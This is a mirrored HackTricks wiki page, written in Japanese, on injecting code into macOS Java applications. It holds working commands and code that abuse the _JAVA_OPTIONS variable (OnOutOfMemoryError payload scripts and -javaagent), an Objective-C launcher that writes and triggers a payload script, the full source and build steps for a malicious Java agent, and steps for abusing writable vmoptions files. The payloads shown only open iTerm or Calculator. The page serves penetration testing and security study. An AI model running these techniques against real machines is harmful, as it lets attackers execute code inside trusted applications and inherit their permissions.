mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
155 lines
6.5 KiB
Markdown
155 lines
6.5 KiB
Markdown
# macOS Java Applications Injection
|
||
|
||
{{#include ../../../banners/hacktricks-training.md}}
|
||
|
||
## Enumeration
|
||
|
||
システムにインストールされているJavaアプリケーションを見つけます。**Info.plist**内のJavaアプリは、**`java.`**という文字列を含むいくつかのJavaパラメータを含むことが確認されているため、それを検索できます:
|
||
```bash
|
||
# Search only in /Applications folder
|
||
sudo find /Applications -name 'Info.plist' -exec grep -l "java\." {} \; 2>/dev/null
|
||
|
||
# Full search
|
||
sudo find / -name 'Info.plist' -exec grep -l "java\." {} \; 2>/dev/null
|
||
```
|
||
## \_JAVA_OPTIONS
|
||
|
||
環境変数 **`_JAVA_OPTIONS`** は、Javaコンパイルされたアプリの実行時に任意のJavaパラメータを注入するために使用できます:
|
||
```bash
|
||
# Write your payload in a script called /tmp/payload.sh
|
||
export _JAVA_OPTIONS='-Xms2m -Xmx5m -XX:OnOutOfMemoryError="/tmp/payload.sh"'
|
||
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
|
||
```
|
||
新しいプロセスとして実行し、現在のターミナルの子プロセスとしてではなく実行するには、次のようにします:
|
||
```objectivec
|
||
#import <Foundation/Foundation.h>
|
||
// clang -fobjc-arc -framework Foundation invoker.m -o invoker
|
||
|
||
int main(int argc, const char * argv[]) {
|
||
@autoreleasepool {
|
||
// Specify the file path and content
|
||
NSString *filePath = @"/tmp/payload.sh";
|
||
NSString *content = @"#!/bin/bash\n/Applications/iTerm.app/Contents/MacOS/iTerm2";
|
||
|
||
NSError *error = nil;
|
||
|
||
// Write content to the file
|
||
BOOL success = [content writeToFile:filePath
|
||
atomically:YES
|
||
encoding:NSUTF8StringEncoding
|
||
error:&error];
|
||
|
||
if (!success) {
|
||
NSLog(@"Error writing file at %@\n%@", filePath, [error localizedDescription]);
|
||
return 1;
|
||
}
|
||
|
||
NSLog(@"File written successfully to %@", filePath);
|
||
|
||
// Create a new task
|
||
NSTask *task = [[NSTask alloc] init];
|
||
|
||
/// Set the task's launch path to use the 'open' command
|
||
[task setLaunchPath:@"/usr/bin/open"];
|
||
|
||
// Arguments for the 'open' command, specifying the path to Android Studio
|
||
[task setArguments:@[@"/Applications/Android Studio.app"]];
|
||
|
||
// Define custom environment variables
|
||
NSDictionary *customEnvironment = @{
|
||
@"_JAVA_OPTIONS": @"-Xms2m -Xmx5m -XX:OnOutOfMemoryError=/tmp/payload.sh"
|
||
};
|
||
|
||
// Get the current environment and merge it with custom variables
|
||
NSMutableDictionary *environment = [NSMutableDictionary dictionaryWithDictionary:[[NSProcessInfo processInfo] environment]];
|
||
[environment addEntriesFromDictionary:customEnvironment];
|
||
|
||
// Set the task's environment
|
||
[task setEnvironment:environment];
|
||
|
||
// Launch the task
|
||
[task launch];
|
||
}
|
||
return 0;
|
||
}
|
||
```
|
||
しかし、それは実行されたアプリでエラーを引き起こします。よりステルスな方法は、Javaエージェントを作成し、次を使用することです:
|
||
```bash
|
||
export _JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'
|
||
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
|
||
|
||
# Or
|
||
|
||
open --env "_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'" -a "Burp Suite Professional"
|
||
```
|
||
> [!CAUTION]
|
||
> エージェントをアプリケーションとは**異なるJavaバージョン**で作成すると、エージェントとアプリケーションの両方の実行がクラッシュする可能性があります
|
||
|
||
エージェントは次のようになります:
|
||
```java:Agent.java
|
||
import java.io.*;
|
||
import java.lang.instrument.*;
|
||
|
||
public class Agent {
|
||
public static void premain(String args, Instrumentation inst) {
|
||
try {
|
||
String[] commands = new String[] { "/usr/bin/open", "-a", "Calculator" };
|
||
Runtime.getRuntime().exec(commands);
|
||
}
|
||
catch (Exception err) {
|
||
err.printStackTrace();
|
||
}
|
||
}
|
||
}
|
||
```
|
||
エージェントをコンパイルするには、次のコマンドを実行します:
|
||
```bash
|
||
javac Agent.java # Create Agent.class
|
||
jar cvfm Agent.jar manifest.txt Agent.class # Create Agent.jar
|
||
```
|
||
`manifest.txt`:
|
||
```
|
||
Premain-Class: Agent
|
||
Agent-Class: Agent
|
||
Can-Redefine-Classes: true
|
||
Can-Retransform-Classes: true
|
||
```
|
||
そして、環境変数をエクスポートし、次のようにJavaアプリケーションを実行します:
|
||
```bash
|
||
export _JAVA_OPTIONS='-javaagent:/tmp/j/Agent.jar'
|
||
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
|
||
|
||
# Or
|
||
|
||
open --env "_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'" -a "Burp Suite Professional"
|
||
```
|
||
## vmoptionsファイル
|
||
|
||
このファイルは、Javaが実行されるときに**Javaパラメータ**の指定をサポートします。以前のいくつかのトリックを使用して、Javaパラメータを変更し、**プロセスが任意のコマンドを実行する**ようにすることができます。\
|
||
さらに、このファイルは`include`ディレクトリを使用して**他のファイルを含む**こともできるため、含まれているファイルを変更することもできます。
|
||
|
||
さらに、一部のJavaアプリは**複数の`vmoptions`**ファイルを**ロード**します。
|
||
|
||
Android Studioのような一部のアプリケーションは、これらのファイルを探している**出力を示します**。
|
||
```bash
|
||
/Applications/Android\ Studio.app/Contents/MacOS/studio 2>&1 | grep vmoptions
|
||
|
||
2023-12-13 19:53:23.920 studio[74913:581359] fullFileName is: /Applications/Android Studio.app/Contents/bin/studio.vmoptions
|
||
2023-12-13 19:53:23.920 studio[74913:581359] fullFileName exists: /Applications/Android Studio.app/Contents/bin/studio.vmoptions
|
||
2023-12-13 19:53:23.920 studio[74913:581359] parseVMOptions: /Applications/Android Studio.app/Contents/bin/studio.vmoptions
|
||
2023-12-13 19:53:23.921 studio[74913:581359] parseVMOptions: /Applications/Android Studio.app.vmoptions
|
||
2023-12-13 19:53:23.922 studio[74913:581359] parseVMOptions: /Users/carlospolop/Library/Application Support/Google/AndroidStudio2022.3/studio.vmoptions
|
||
2023-12-13 19:53:23.923 studio[74913:581359] parseVMOptions: platform=20 user=1 file=/Users/carlospolop/Library/Application Support/Google/AndroidStudio2022.3/studio.vmoptions
|
||
```
|
||
それがない場合は、次のコマンドで簡単に確認できます:
|
||
```bash
|
||
# Monitor
|
||
sudo eslogger lookup | grep vmoption # Give FDA to the Terminal
|
||
|
||
# Launch the Java app
|
||
/Applications/Android\ Studio.app/Contents/MacOS/studio
|
||
```
|
||
この例では、Android Studioがファイル **`/Applications/Android Studio.app.vmoptions`** を読み込もうとしていることがどれほど興味深いかに注意してください。これは、**`admin` グループ** の任意のユーザーが書き込みアクセスを持つ場所です。
|
||
|
||
{{#include ../../../banners/hacktricks-training.md}}
|